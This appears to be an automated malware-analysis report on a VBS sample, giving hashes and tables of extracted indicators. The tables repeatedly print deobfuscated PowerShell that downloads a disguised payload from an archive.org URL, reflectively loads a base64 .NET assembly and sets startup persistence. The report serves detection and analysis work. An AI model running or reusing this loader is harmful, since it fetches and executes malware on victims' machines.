| Hash | Hash Value |
|---|---|
| MD5 | 56bef4d9f0775a407359835a12db9d18 |
| Sha1 | 59299989e98ce2c9123fe1959ed3530db72780ac |
| Sha256 | ac4f52f2a9cd30338e5a41ed8330255617f8f51899e14e6199c64f4df54f6e34 |
| Sha384 | acdcdfa1d504a7f408542df244f936c475dfe7c783695fa3991cbb7535f56d896be951aba4b55f3c623255cf8f50fb99 |
| Sha512 | 1fd81804a0e1109b8a661d94a38c0358dbea49e96dd05013227514e075737ab0422b2a6a482851f3f00d14e8c678253e8081a40d8aa1d42eeb09d5c4eacacc58 |
| SSDeep | 768:WFmxPh1BETehHDKGXBavzooGaQ7G07XQAtK+Z+bZ4Z8ZdZ9ZpOYiao:WFzTehHeGXDt5XQuKa5YNo |
| TLSH | 9C8387E2BC521C0A5803F42F88F479DEB546DDB7F2B6FC70910904594EAE6859EA3C6C |

| Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |

| Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html | 56bef4d9f0775a407359835a12db9d18 |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AppLaunch", "", "AppLaunch", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 56bef4d9f0775a407359835a12db9d18 > 56bef4d9f0775a407359835a12db9d18.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |